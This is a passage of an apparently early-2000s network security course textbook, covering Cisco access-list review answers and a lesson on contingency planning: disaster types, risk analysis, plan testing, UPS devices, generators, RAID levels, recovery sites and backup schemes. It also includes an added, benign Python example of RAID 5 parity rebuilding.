Extended ACLs allow for port checking.

When a packet enters the router, what is the first thing the router will check regarding that packet?
Is there a route for this packet? If yes, send to the ACLs if there are any; if no, discard the packet (and respond to the sender if need be).

5E What is the syntax for a standard Access Control List?
Router(config)#access-list access-list-number {permit|deny} source [source-mask]

What is the syntax for an extended Access Control List?
Router(config)#access-list access-list-number {permit|deny} protocol source source-mask destination destination-mask [operator|operand]

What is the syntax for implementation of a standard Access Control List?
Router(config-if)#ip access-group access-list-number {in|out}

What is the command for an access list to be implemented on the VTY sessions?
access-class [access list number] in

5F When a configuration change is made to the router, such as an interface being brought down, what level of message will this generate?
Level 5.

LESSON 6
Contingency Planning

Overview
In this lesson, you will take a look at various types of disasters that can befall an organization and put it out of business, unless the organization has implemented some form of business continuity planning. You will look at how such plans can be developed and tested. You will review some technologies that can help keep you powered on, backup strategies for operating systems, and products that can be used in various situations.

Objectives
In this lesson, you will:

6A Identify disaster types, examine issues related to contingency planning, and consider the role of security policies as part of an overall contingency planning strategy.
In this topic, you will see why you have to plan for backups, look at the various types of disasters that can occur, and briefly look at security policies and their effect on business.

6B Analyze contingency planning goals, and review the testing of such plans.
In this topic, you will analyze the goals of a contingency plan, and look at the various aspects of testing a contingency plan.

6C Study the effect of electrical power loss for networks and the backup planning required to prevent such events.
In this topic, you will analyze the effects of losing electrical power on your network, and look at various devices that you can use to defend against such disturbances, such as UPS devices and generators.

6D Examine data-backup strategies for various operating systems and perform tasks related to backups.
In this topic, you will look at backup strategies for operating systems, such as RAID, and other archival options, such as tapes or other hard drives. You will perform hands-on operations detailing the differences between normal, differential, and incremental backups. You will also perform a backup of a Cisco router's configuration.

Data Files: none
Lesson Time: 4 hours

Lesson 6: Contingency Planning 379

Topic 6A
Continuity and Recovery

For this lesson, we will look at continuity and recovery for the following areas:
Computers
Networks
The premises that house them

Contingency planning forms a significant part of modern business. If a business is to survive a disaster and move forward, it has no choice but to plan for and allocate sufficient resources to cater to the recovery process. When continuity and recovery planning are discussed in boardrooms, computers and networks are just one of the many issues talked about, although most businesses have, in the last decade, begun to rely heavily on technology to get the job done. Computers and networks are therefore justifiably critical components in any modern business.

Planning for Backups

Before a continuity and recovery system is put into place for an organization, a study needs to be undertaken in order to classify the nature of the business and its requirement for putting a recovery system in place.

This study can be undertaken by one person or by a team of people representing a cross-section of the people employed by the organization, depending on the size of that organization. As with anything that has a financial connotation, the organization's upper management has to be involved and made aware of the implications of implementing the various technologies involved, but upper management does not necessarily need to have all of the little details.

Depending on the problems that need solving, solutions can vary. Beginning with creating an Appropriate Resource Usage document or Acceptable Use Policy for the users, to controlling user behavior within the bounds of acceptance, to defining what resources need protection and what resources need to be backed up, to defining what resources need to have a redundant but live copy, the individuals or the team members leading the study have their work cut out for them.

Acceptable Use Policies will be dealt with in greater detail in the Network Defense and Countermeasures course.

Disasters

Disasters that can affect businesses can be classified into various categories depending on whom you talk to; however, we can start by classifying them broadly into natural and man-made categories. Here are some examples of each:

Examples of Disasters

Natural disasters include:
Floods.
Earthquakes.
Tornadoes.
Getting hit by a meteorite.

Man-made disasters include:
Intentional disasters, such as terrorist attacks, worker lockouts/strikes, and so forth.
Unintentional disasters, such as design error, operator error, mismanagement, and so forth.

You may have noticed that we didn't mention fire in the enumeration of disasters. Fires can be a result of either a natural or man-made cause. When fires are man-made, they could be intentional or unintentional.

Environmental Disasters

Certain natural disasters are known to be fairly regular in certain locations. For example, in some low-lying areas of Florida, the threat of flooding is fairly high during the hurricane season. Tornadoes are common in Kansas, forest fires break out now and then in the southwest regions of the U.S., and the threat of an earthquake always looms over one well-known city in California.

Analyzing which natural disasters to take into account, and which not to, is fairly straightforward. First, list all known natural disasters, then highlight those that are likely in your location. Those that are not highlighted are extremely unlikely or improbable for that location.

Not much can be done to prevent natural disasters. You should, however, have a recovery plan. For a recovery plan to be effective, it should be housed in structurally and environmentally sound buildings or it should be housed far away, perhaps in another geographic location, if your business is to survive such calamities.

As an example, and on a more serious note, just a few days after the 9-11 terrorist attacks, American Express sent an email to all its valued customers, reassuring everyone that even though their offices in Manhattan were affected, their business was not, due to the excellent backup and recovery systems maintained elsewhere.

Technological or Man-made Disasters

In analyzing which man-made disasters to take into account, and which not to, all bets are off. Let's revisit the list we created earlier. Broadly speaking, man-made disasters are divided into intentional and unintentional subcategories. Terrorist attacks are intentional. They can be vicious, physical attacks, or they can be more subtle, such as cyber-terrorism.

Worker lockouts or worker strikes are generally known to the management beforehand, so some planning can be done. Computer viruses, worms, and Trojan horses all fall under the man-made and intentional categories. Programmers who write and spread such code do so with the knowledge that their creations are going to cause harm. These are disasters waiting to happen. Sometimes these programs are released under the guise of remote management tools, but they can be used maliciously, nevertheless. Attacks fashioned against email and Web servers aim to paralyze a company by targeting its digital nervous system. Today, firewalls, intrusion detection systems, and response systems are part of a huge industry, thanks to the previously-mentioned breed of programmers.

virus: A program that can infect other programs by modifying them to include a possibly evolved copy of itself.

worm: Independent program that replicates from machine to machine across network connections, often clogging networks and information systems as it spreads.

Unintentional man-made disasters are very difficult to gauge or predict. If a disaster is due to a design error, you generally have to go back to the drawing board. If it's due to operator error or mismanagement, you have to reform your usage policies. Sometimes, just the day-to-day wear and tear on computer systems will bring them down. The classic components in computer systems that suffer such wear and tear are the hard drives, simply because they are comprised of moving parts: spinning disks and read/write heads that swing back and forth along the disk surfaces. Modern hard drives are surprisingly durable, but they still have a useful life of around five years. Since data and programs reside mainly on hard drives, you have to plan on backing them up periodically.

Loss of electrical power, even momentarily, can be disastrous, so all sensitive systems should be able to instantaneously switch over to a backup power system. A better method would be to run the systems off of the backup system while continually recharging it. This should not surprise anyone; take a look at how your notebook works. In fact, some companies that have realized this are beginning to furnish every user's desk with a docking station and a notebook instead of a desktop PC, simply because a momentary power outage would not disrupt anybody's work.

Electrical power fluctuations (spikes, surges, sags, brownouts, faults, and blackouts) can also cause havoc; therefore, one of the preventive measures that must be addressed should deal with conditioning and steadying the power supply before it is fed into your computer and network systems.

Security Policies and Their Impact on the Business

In Network Defense and Countermeasures, the next course in this series, you will do a lot more work on analyzing risk and formulating security policies for your organization, so we will just touch on it lightly here.

Before writing a security policy, all risks that can be foreseen have to be analyzed. Broadly speaking, there are two kinds of analyses that can be performed: qualitative and quantitative.

Quantitative Risk Analysis

It's the quantitative risk analysis that will interest the upper management of a company (those who allocate budgets, for instance), because with this method, a dollar value can be assigned to the potential risk at hand. A quantitative analysis has two basic parts: the probability of a threat occurring and the estimated loss that will result from the threat.

threat: The means through which the ability or intent of a threat agent to adversely affect an automated system, facility, or operation can be manifest. A potential violation of security.

Insurance companies use quantitative analysis frequently. Think for a few minutes on the initial conversation you had with your motor vehicle insurance provider. What kinds of questions were you asked? Typically, you would have been asked to answer the following kinds of questions:

What is the make and model of the car?
How many miles a day would you typically drive to work?
Does your car have airbags?
Have you been ticketed for speeding before?
What kind of coverage do you expect to have?
Do you park your car in an enclosed space or on a street side?
Do you wear seat belts? It may be the law, but they will still ask you.
Have you, as a driver, been involved in any accidents before?
What is your age, as well as the age of anyone else who would be driving the car?

Basically, the insurance company profiles you according to the answers that you provide to these questions. Between the profile they create of you and the kind of coverage you expect to have, they will give you a quote for your monthly, quarterly, half-yearly, or annual premium. They have thus performed a quantitative risk analysis on you and your car.

To create a quantitative risk analysis for your computers and networks, you would do something similar. For example, you might use the following sequence:
1. Create an inventory of all assets within your network.
2. Identify all of your users, including information about the type of users, their day-to-day demands on the network, and so forth.
3. Analyze what kind of security systems you have, such as authentication mechanisms and access control.
4. Determine what kind of backup systems are already in place.
5. Identify what risks are covered and what are not.
6. Determine if the uncovered risks are acceptable to your company.

Based on analyses like these, you would be able to recognize the need for backup systems, what your company would do in the event that disaster struck, and how the recovery methodologies would be put to work.

Backup and Recovery Policies

The backup and recovery section of a security policy provides the foundation for the continuity of the entire organization. A generic definition of the policy is that it provides a document, or a set of documents, that describes the backup security controls that are to be implemented in an organization. From a benefit standpoint, the policy is able to provide the organization with several key points. These benefits can be generalized into the following:
They lower the legal liability to employees and third-party users of resources.
They prevent waste of resources.
They protect proprietary and confidential information from theft, unauthorized access or modification, or internal misuse of resources.

Topic 6B
Developing the Plan

To develop an effective contingency plan, you need to have some ideas about what the plan should cover, as well as how to test it so that you know that it will work when you need it to. Let's begin by looking at what you want the plan to accomplish.

Requirements and Goals of a Contingency Plan

Once a risk analysis has been done for a company, and it has been agreed to by the planning team, it will be up to the executive group to implement a contingency plan. All items that require some form of backup plan have to be listed. For example, take a look at the following table.

Number  Item                    Standard          Backup
1       Electrical power        Utility company   UPS
2       Computer data           Hard drives       Tape drives
3       Backed-up data          Tape drives       DVD-R
4       Internet access         T1 from ISP A     SDSL from ISP B
5       Internet access backup  SDSL from ISP B   Via satellite from ISP C

In this table, you can see that there are secondary backup plans for the backup plans themselves. This depends on the criticality of the item in question. If Internet access is a critical issue, then the company has to choose its ISP(s) wisely. Not only should the company hedge its bets with multiple ISPs, it also should make sure that it has a different physical line running out of its building to the ISP. If an ISP is offering DSL services by leasing bandwidth from your local phone company and the local phone company has a fault, then your company may not have Internet access at all for a couple of days until the fault on the phone line is rectified. A wireless solution via satellite, for example, will take a completely different path out of your building and may allow you to hedge your bets.

Listing the goals of contingency planning is a critical step, as this will have a direct bearing on how the plan should be implemented and in what sequence. The previous table looks like somebody read the minutes of the first brainstorming meeting and attempted to order the list into a chart. It is clearly a first attempt. After a few more meetings, more issues will be brought forth and may include other items that are imperative for the business if it has to survive a disaster. Not only should the contingency plan list and analyze all possible threats to the business, the backup plans to counter these threats should also be graded in order of importance to the continuity of the business. Responsibility has to be assigned to a person, and a brief description of the job required to carry out that plan has to be noted. The person selected (or the position in the company) has to be provided appropriate authority to carry out the task. Emergency roles have to be defined. The priority of tasks to be carried out has to be listed as per the grades allocated. Finally, a simulation of the crisis has to be carried out.

Creating the Contingency Plan

The team of people designated to handle a crisis can be a different team from the one handling that job on a daily basis. Some diversity is desired, because in an emergency, the people who handle the job on a daily basis may not be around. If immediate action is paramount, for example, if backup tapes have to be used to restore the systems right away, then more than one network administrator must be trained in this process. This is an extremely critical process; restoring the wrong backup data could set the company back by that many days, weeks, or maybe even months.

Testing the Plan

Any backup and restore plan that you come up with must be tested, both in theory and in practice. The theoretical outline must be vetted by more than one person involved in the system and their comments debated. Once everyone involved in the process is in agreement, the plan has to be clearly stated. All concerned personnel involved in the recovery effort should be given a copy of this plan for study.

Contingency Plan Testing

Testing of plans can be done at various levels and intensities. They are broadly divided as follows:
Simulated testing on paper (or check list test).
Limited environment simulation (or structured walk-through test).
Full-scale environment simulation (or full interruption test).

Simulated Testing on Paper (the Check List Test)

When all of the personnel involved in the recovery effort have been given sufficient time to study their roles in the recovery process, they should walk through the steps in a sort of dry run of the procedures involved. This is also known as a check list test or a simulated paper test. Different disaster scenarios are recorded on a whiteboard, and the various personnel start filling in the blanks to the recovery plan based on the role(s) allocated to them. This is akin to reading through a script before staging a rehearsal for a play.

Limited Environment Simulation (the Structured Walkthrough Test)

An example of limited environment simulation that many of you might be familiar with is when the electronic surveillance monitoring and security systems are first installed at your premises. After the alarm system has been installed, a select few people with certain levels of responsibility in the company are informed of the code to enter upon opening the premises. The contact phone numbers for these people are given to the company that installed the security system. Upon installation of the system and initial testing, the system alarm is tripped, and the alarm is automatically sent to the security company. The security company personnel look up their list of phone numbers for your company and proceed to call each one, in turn, down the list. If none of the people on that list answer the phone, then the local police are called in to investigate a potential break-in.

Another example is the fire drill, typically carried out in tall buildings. When fire-escape drills are first explained to the general building populace, every aspect of the escape process is walked through. These are also referred to as structured walk-through tests. This is different than having an unannounced drill, where the occupants are caught by surprise, and the sanctity of the drill is maintained by carrying it out at irregular intervals.

Similarly, once a backup system is in place, then the recovery system should be put through its paces to make sure it works. When various departments in an organization that normally interact with each other in a certain way now find that there are other interaction channels, situations may arise. Typical problems that occur have to do with the hierarchical nature of most large organizations. A person at a senior level in one department may feel that he or she does not have to answer to a person in a peer position in another department. These issues should be catalogued, then the backup and recovery plan should be reviewed to take them into account.

Full-scale Environment Simulation (the Full Interruption Test)

availability: Assuring information and communications services will be ready for use when expected.

A full-scale simulation can also be undertaken so that all aspects of a recovery process are tested. This kind of test is performed infrequently, with retests spaced far apart, as it is disruptive to the organization. The majority of the people in the company are not told in advance that it is a test. Such a test, also termed a full interruption test, will actually test the reaction of all the personnel within the organization. Not everybody reacts well under stress, and this test will help in identifying those people who can be trusted to undertake critical jobs in an emergency.

In a full-scale simulation test, a disaster scenario is chosen and the recovery plan for that scenario is actually executed, step by step, to see if it works. Restrictions to the availability of resources are mimicked as with an actual disaster. The simulation may be designed so that any backup or recovery mechanisms that are available at a hot, warm, or cold site (you'll see more about these later) that need to be accessed to expedite recovery can be accessed. Unexpected or unpredictable events can occur during a simulation test. As with the structured walk-through tests, such events should be recorded, then the backup and recovery plan should be reviewed to take them into account. Once the reason for the unexpected event is understood, then the backup and recovery plan should be modified to take this into account. In an actual simulation test, the organization's day-to-day workings are not disturbed, because only those personnel involved in the recovery operations are affected.

Topic 6C
The Technologies of Staying On

Most of us rely on our local power utility companies as our primary power source. Depending on the criticality of the business, we may choose to supplement this with some form of battery backup or even generate our own power, with appropriate technologies to assist in the switchover.

Disturbances in Electrical Supply and Their Remedies

Spike busters and surge suppressors help protect against only spikes and surges; voltage stabilizers help protect against spikes, surges, and sags. Not only do backup batteries take care of those scenarios, they also help protect against faults and brownouts, as well as short-term blackouts. Generator sets help protect against prolonged blackouts. Figure 6-1 will help explain these relationships better.

Figure 6-1: Disturbances in electrical supply and their remedies.

Personal UPS Devices

If you visit www.tigerdirect.com and look for power protection devices, you will see the following subcategories: surge suppressors, UPS Battery Backup (Personal), UPS Battery Backup (Business), UPS Battery Backup (Network). This is pretty much how UPS devices are cataloged. Even if you are not going to buy a UPS system, you should at least have a surge suppressor. Having said that, most personal-use UPS devices are quite affordable and are a must for small businesses. They are rated from around 150 to 300 watts, and provide enough time (about 15 minutes) for you to at least save your work, finish small print jobs, and shut down the computer properly.

Smarter UPS systems will have a separate communication channel with your PC via the serial port or a USB port. In case you are not around when the power fails, the UPS will initiate a clean shutdown of the system. On a Windows machine, you can use the Power Options Control Panel to manage your UPS devices. This interface was developed by APC for Microsoft. On a Linux machine, you can use APCUPSD (APC's UPS Daemon), which is available at www.apcupsd.com/index2.html.

TASK 6C-1
Configuring a UPS

Setup: You are logged on to Windows 2000 as the renamed Administrator account.
It does not matter that you do not have a UPS; you are just taking a look at how to configure one.

1. Open the Power Options Control Panel.
2. Select the UPS tab.
3. In the Details box, click the Select button.
4. Under Select Manufacturer, select American Power Conversion. There are many models to choose from.
5. Select Back-UPS Pro. For On Port, verify that COM1 is selected. Click Finish.
6. Now you should see the Configure button. Click Configure.
7. Examine the options. They include Minutes On Battery Before Critical Alarm, When The Alarm Occurs Run This Program, and Next, Instruct The Computer To Shutdown.
8. Click Cancel twice, and close the Control Panel window.

Full Server Rack UPS Devices

Higher-end UPS devices are essentially the same in function as their smaller cousins, but with some significant differences that add to their costs, such as:

- Increased battery capacity (high-end models enable you to hot-swap batteries).
- Battery packs typically have faster recharge times.
- The software used to communicate with the PC is richer in features.
- Incoming and outgoing electrical supplies are rigorously monitored. Event logging may be included. Output is sometimes user-adjustable.
- Some UPS devices can be rack-mounted. Such devices, being modular, allow for easy expansion.
- High-end models may go up to 500 KW to 1 MW, requiring a three-phase circuit.
- A greater range of environmental variables for operation is available.
- Some UPS models may themselves be fault-tolerant (that is, they will have some level of redundancy built in).
- Displays on the UPS devices can be LCD readouts, rather than just LED signals.
- Some UPS devices are SNMP-compatible (directly addressable on a network, or even via the Web), apart from the usual communication channels (serial or USB ports).

Building Generators

About 15 years ago, the Indian government wanted to buy a Cray supercomputer for weather analysis and prediction. The U.S. government stepped in and blocked the sale, suspecting that the supercomputer could be clandestinely used for military purposes. The Indian government then turned to its premier computer engineers and programmers at the Centre for Development of Advanced Computing (CDAC), who then proceeded to design and build a massive parallel distributed computer (PARAM) by using a bunch of mini computers and hundreds or thousands of PC-class computers, all on a network.

Needless to say, the engineers accomplished their task in a few years and delivered the equivalent of a supercomputer.

One of the pilot projects was housed in a single building with entire floors filled with workstations. The incoming power supply was stabilized and fed to a switching station. If this external power supply ever tripped, a backup generator that could meet the needs of the whole building would take over. If this backup generator ran out of fuel (diesel) or malfunctioned, a second identical backup generator would take over. If either of these malfunctioned or if diesel was in short supply, a third backup generator would kick in. This third backup generator ran on a fuel other than diesel. The power generated was also stabilized and fed to the switching station. The basement was taken over and dedicated to banks of batteries from floor to ceiling. So a steady source of electricity, whether from an external source or from the generators, constantly recharged these banks of batteries, which then fed squeaky-clean power to the computers in the building. In effect, the entire building was a single computer and the basement was the UPS.

Multiple Backups of Power Supplies

Figure 6-2: Multiple backups of power supplies for the CDAC pilot.

Do most companies go to these extremes when designing electrical systems for their networks? Not likely. But would they do it if it was mission-critical? Absolutely. The above example is just one of thousands of such installations across the U.S. and around the world.

Generator Types

Visit www.intenergies.com, a Georgia-based company, and click the Energy Library link for a good tutorial on energy, power generation, and related issues.

Electrical output can be broadly classified into two types: DC (Direct Current) and AC (Alternating Current). As we all know, the advantage of DC is that it can be stored, while AC cannot. AC can, however, be piped over vast distances, albeit with some losses along the way. Because AC power typically suffers from fluctuations, it is necessary to condition it before it reaches sensitive electrical equipment, for which we typically use devices like voltage stabilizers and spike busters. Most of your electrical equipment then converts the received AC power as required for the job.

Depending on the country you are in, the voltage required to run most of your electrical equipment can be broadly divided into 110 V AC at 60 Hz (mostly North America) or 220 V AC at 50 Hz (the rest of the world), though you will find exceptions here and there. Cuba, for example, supports both 110 V and 220 V. For a more comprehensive list, visit http://kropla.com/electric2.htm.

Portable generators are generally in the 5 KW range and top out at around 8 to 10 KW. Typical home systems top out at around 20 KW, while on-site generators for buildings can be installed at various capacities, typically from 50 KW systems to 2 MW systems, depending on your requirements and budgetary constraints. As of this writing, it costs approximately $800 to $1200 per installed KW in the U.S., so a 50 KW system may cost around $60,000 to install while a 2 MW system may cost around $1.6 million to install. Note that there are a number of variables to consider, so these figures are useful only for initial discussions. You have to work with a manufacturer for more accurate pricing. For a first look at such issues, check out this Web site: www.westernmachinery.com. Of course, you can always start at the world's number 1 electrical company, GE, at their Web site: www.gepower.com.

Fuel Types

Diesel, propane, kerosene, gasoline (or petrol), CNG (compressed natural gas), LNG (liquefied natural gas), methanol, and ethanol are all popular types of fuel used by generators. The decision to use one type of fuel over another is typically made from a purely economic standpoint (apart from the fact that all of them release pollutants into the atmosphere and the local laws governing storage, use, and pollution control vary). In a few years, this topic will have to be completely rewritten, with emerging fuel-cell technologies holding a lot of promise.

Generator Implementation

Most small and medium-sized businesses in the U.S. take it for granted that electricity is to be purchased from the utility company serving their locality and that on-site power generation is only a fault-tolerant measure. Larger establishments, however, that are fed up with erratic pricing and supply by utility companies (reinforced all the more by the events that took place early in 2001 in California) can make a conscious decision to install their own generation plant, and completely bypass the utility company altogether. In fact, they can even connect back to the grid and sell any excess power generated to the utility companies. The decision to implement a generator system for your building(s) is driven by economies of scale, but at least the consumer has a growing list of options that weren't available just a decade ago.

Topic 6D
Backing Up the Operating Systems

There are many options for backing up the operating system, including:

- A tape backup of the OS. There are many methods of using tapes to back up the OS. Operating systems might have their own backup software, or you can go with vendor-specific solutions. More about tape backups will follow later.
- Using fault-tolerant disk configurations allowed by the OS. This is one of the first steps to take when implementing some measure of backup. Such configurations are also termed Redundant Array of Independent Disks (RAID) and are assigned numbers to represent various configurations, such as disk mirroring (RAID 1) or disk striping with parity (such as RAID 5).
- Vendor-specific fault-tolerant configurations. As with tape backups, operating systems can have their own RAID software, or you can go with vendor-specific solutions. These are typically hardware solutions, such as a mirrored RAID 0, also known as RAID 10. Hardware solutions take the load off of the CPU and are therefore faster and more suited for heavy-duty servers. Low-end systems may simply use the operating system's feature set to implement a supported RAID level.
- A complete, fully functioning machine configured as a backup. This is typically found in fault-tolerant cluster configurations. Two-way and four-way clusters are popular configurations, but can be implemented only by using operating systems at the higher end of the spectrum. Larger clusters can be created, but this requires highly specialized knowledge and personnel trained in the assembly of such systems.

The decision to use one RAID level over another depends on disk-utilization efficiencies, and therefore on the time to restore as well. For example, RAID 1 will allow you to utilize only 50 percent of the disk space earmarked. RAID 5 using three drives will allow you to utilize 66 percent (two out of three). However, in the event of a failure, RAID 1 will be up and running in next to no time, while RAID 5 will take some time to rebuild the data off the parity information stored on the other drives.

Over and above these ready-made solutions for backup, a usage policy is critical to the success of the backup operation. Users must be trained to store their finished work on the file servers, or policies should be enforced that would prevent users from accessing local storage space.

RAID Levels

To explain the various RAID levels, we will use several figures. As you review these figures, note that the word level is misleading, as it connotes that one level leads to another. It is better to simply think of these numbers the way we treat some letters of the Greek alphabet: as mathematical constants. Each figure also includes a percentage of efficiency. This is simply an indicator of how much disk space assigned to that RAID level can be used for actual data storage. It does not mean that one version is more efficient than the other. This is just a traditional way of expressing utilization percentage.

Figure 6-3 shows RAID level 1, with disk mirroring.

RAID Level 1, Disk Mirroring

Figure 6-3: RAID level 1, disk mirroring.
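To make the RAID 5 rebuild cost and the utilization percentages concrete, here is an added example (not the course's or any vendor's code) of a toy RAID 5 stripe: XOR parity, reconstruction of a single lost disk, and the usable-capacity fractions quoted for RAID 1, RAID 5 and RAID 10. The disk count, chunk contents and parity rotation rule are constructed assumptions.

```python
"""Added example (not the course's or any vendor's code): a toy RAID 5 stripe
with XOR parity, the rebuild of one failed disk, and the usable-capacity
fractions the lesson quotes for RAID 1, RAID 5 and RAID 10.

Assumptions of this model: every disk holds one equal-length chunk per stripe,
the parity chunk rotates across disks by stripe number, and a failed disk is
represented by None.  Real controllers add caching, metadata and write-hole
handling that are omitted here.
"""
from typing import List, Optional


def xor_bytes(chunks: List[bytes]) -> bytes:
    """XOR any number of equal-length chunks together."""
    width = len(chunks[0])
    out = bytearray(width)
    for chunk in chunks:
        if len(chunk) != width:
            raise ValueError("all chunks in a stripe must be the same length")
        for i, b in enumerate(chunk):
            out[i] ^= b
    return bytes(out)


def parity_position(stripe_index: int, n_disks: int) -> int:
    """RAID 5 rotates parity so that no single disk becomes the parity bottleneck."""
    return (n_disks - 1 - stripe_index) % n_disks


def write_stripe(data_chunks: List[bytes], stripe_index: int, n_disks: int) -> List[bytes]:
    """Lay out one stripe: n_disks-1 data chunks plus one parity chunk."""
    if len(data_chunks) != n_disks - 1:
        raise ValueError(f"RAID 5 on {n_disks} disks takes {n_disks - 1} data chunks per stripe")
    disks = list(data_chunks)
    disks.insert(parity_position(stripe_index, n_disks), xor_bytes(data_chunks))
    return disks


def read_stripe(disks: List[bytes], stripe_index: int) -> List[bytes]:
    """Return the data chunks of an intact stripe, skipping the parity chunk."""
    p = parity_position(stripe_index, len(disks))
    return [chunk for i, chunk in enumerate(disks) if i != p]


def rebuild_stripe(disks: List[Optional[bytes]]) -> List[bytes]:
    """Reconstruct one failed disk from the survivors.

    With exactly one chunk missing it equals the XOR of all the others, whether
    the lost chunk held data or parity.  Every surviving disk has to be read to
    do it, which is why the lesson says a RAID 5 rebuild takes time while a
    RAID 1 mirror is usable at once.
    """
    missing = [i for i, chunk in enumerate(disks) if chunk is None]
    if len(missing) > 1:
        raise RuntimeError("RAID 5 tolerates only one failed disk per stripe")
    survivors = [chunk for chunk in disks if chunk is not None]
    replacement = xor_bytes(survivors)
    return [replacement if chunk is None else chunk for chunk in disks]


def usable_fraction(level: str, n_disks: int) -> float:
    """The lesson's 'percentage of efficiency': usable capacity / raw capacity."""
    if level == "0":                       # stripe set, no redundancy
        return 1.0
    if level == "1":                       # mirror or duplex: two copies
        if n_disks != 2:
            raise ValueError("RAID 1 mirrors exactly two disks")
        return 0.5
    if level == "5":                       # one disk's worth of parity per stripe
        if n_disks < 3:
            raise ValueError("RAID 5 needs at least three disks")
        return (n_disks - 1) / n_disks
    if level == "10":                      # mirrored stripe set: half of each pair
        if n_disks < 4 or n_disks % 2:
            raise ValueError("RAID 10 needs an even number of disks, at least four")
        return 0.5
    raise ValueError(f"unknown RAID level: {level}")


def demo() -> bool:
    """Constructed three-disk stripe: lose a data disk, then lose the parity disk."""
    data = [b"AAAA", b"BBBB"]                 # two data chunks of stripe 0
    stripe = write_stripe(data, 0, 3)         # parity lands on disk 2
    lost_data: List[Optional[bytes]] = list(stripe)
    lost_data[0] = None
    lost_parity: List[Optional[bytes]] = list(stripe)
    lost_parity[2] = None
    return (rebuild_stripe(lost_data) == stripe
            and rebuild_stripe(lost_parity) == stripe
            and read_stripe(stripe, 0) == data)


if __name__ == "__main__":
    print("rebuild restores the stripe:", demo())
    for level, n in (("1", 2), ("5", 3), ("10", 4)):
        print(f"RAID {level} on {n} disks: {usable_fraction(level, n):.0%} usable")
```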

Figure 6-4 shows RAID level 1, with disk duplexing.

RAID Level 1, Disk Duplexing

Figure 6-4: RAID level 1, disk duplexing.

Figure 6-5 shows RAID level 5, with disk striping and parity.

RAID Level 5, Striping with Parity

Figure 6-5: RAID level 5, striping with parity.

Figure 6-6 shows RAID level 0, with a stripe set.

RAID Level 0, Stripe Set

Figure 6-6: RAID level 0, stripe set.

Figure 6-7 shows RAID level 10, with a mirrored stripe set.

RAID Level 10, Mirrored Stripe Set

Figure 6-7: RAID level 10, mirrored stripe set.

Hardware Options

So far, all of the backup strategies discussed are on the same site, maybe even on the same machine. What if the server room caught fire or was flooded, and all of the machines became inaccessible?

To counter this threat, you have to have off-site facilities. They are classified into three types of sites: cold sites, warm sites, and hot sites. Cold sites are simply working spaces with associated physical security, power outlets, telecommunications, and Internet connectivity. Recovery time at a cold site is typically over three days. This is the most affordable option, and depending on the provider, can cost around $2,000 per month for the average customer. Warm sites, in addition to everything provided for in a cold site, consist of mission-critical components, and are partially, but not completely, configured with equipment. For example, rack mounts may be physically present and electrically ready, with no servers mounted in them. Such a site is viable if the recovery time is allowed to be greater than half a day, but under a day or two. This is by far the most popular option. Pricing cannot be standardized here, as it can only be worked out after the organization and the provider have thoroughly discussed what constitutes a warm site.

Hot sites are practically a working replica of your server and client configurations. This is the most expensive option, and as with warm sites, pricing cannot be standardized here. If disaster strikes, then depending on the remaining manpower available and the training provided to them, the company can be up and running at the hot site in a matter of hours. By the way, the military is trained to do this all the time. Of course, you cannot compare a regular company with the military, but there are occasions when even civilian establishments require such levels of discipline to keep from going out of business altogether.

Typically, an organization would not build and maintain its own cold, warm, or hot sites, but would instead purchase these services from another organization, such as Exodus (now Cable & Wireless PLC). If you visit www.cw.com, select your country, click the Products & Services link, then the Business Continuity & Recovery Services link, and finally the Facility Infrastructure Services link, you can read more about the various services offered by Cable & Wireless to set up such sites for your organization.

For further education in this aspect of your business, you can also visit the Institute for Business Continuity Training at www.ibct.com.

Backup Options

To recover from these kinds of disasters we need a different kind of backup: the kind that, at the end of the day, takes that day's information off the server and puts it away on some external media, where it will not be changed until it is overwritten at some future date. Tape drives are by far the most popular backup media as they are, byte for byte, one of the cheapest forms of data storage. Most of these tapes currently retail for around $70 per 100 GB of storage (that's $0.70 per GB), and the prices continue to fall. At standard 2:1 compression rates, this brings the price down to $0.35 per GB. The only issue is speed. Data transfer rates are in the region of 20 MB/sec. That means filling such a tape to capacity will take just under 3 hours. In large data-storage centers that are performing normal backups daily, vast amounts of information would have to be backed up, and the tape drives would have to run almost incessantly. Therefore, alternative tape-backup solutions exist, whereby once a full backup is prepared, subsequent backups do not need to be backed up byte for byte. Rather, just the data that changed since that full backup was performed needs to be backed up. This is known as a differential backup. If this method gets to be too demanding on tape capacity, then subsequent backups can simply back up data that changed since the last backup. This is known as an incremental backup.

Comparing Normal, Differential, and Incremental Backups

Take a look at Figure 6-8. This explains all three methods of backup. The typical backup cycle is run on a weekly basis. Notice that the normal backup begins over the weekend, when there is sufficient time to do a full, normal backup of the system. If this is a small business and all of the information fits on one tape, then a normal backup can be done every day.

Figure 6-8: Comparing normal, differential, and incremental backups.

When you employ the normal backup routine, restoration is extremely easy. All you need is the last backup. For example, if you need to restore from backup on Thursday, all you need is Wednesday night's tape set.

The differential backup sequence begins like a normal backup sequence does. Over the weekend, a complete, normal backup is created. On Monday night, only those files that were changed on Monday are backed up. Notice that there's not much to back up on Monday. On Tuesday night, only the files that were changed on Monday and Tuesday are backed up. As the week progresses, the amount of data that needs to be backed up continues to grow. However, tapes can still be recycled within the week, as shown. With a differential backup scheme, if you need to restore from backup on Thursday, you need the weekend tape set and Wednesday night's tapes.

The incremental backup sequence begins like a differential backup sequence. Over the weekend, a complete, normal backup is created. On Monday night, only the files that were changed on Monday are backed up. Notice again that there's not much to back up on Monday. On Tuesday night, only the files that were changed on Tuesday are backed up, and so on. With this method of backup, tapes cannot be recycled during the week, as shown.

With an incremental backup scheme, if you need to restore from backup on Thursday, you need the weekend tape set and Monday, Tuesday, and Wednesday night's tapes, so you have to be careful how you label and store these tapes, as the tapes cannot be out of sequence at any time.

In some instances (normal and differential backups), tapes can theoretically be reused without affecting restoration capabilities (the curved arrows connecting Weekend with Tuesday, Monday with Wednesday, and Tuesday with Thursday). Therefore, if you're performing a normal backup, the weekend tape can be reused on Tuesday night, because Monday night's tape holds all of the current information. Monday night's tape can be reused on Wednesday night, while Tuesday's tape can come back on Thursday.

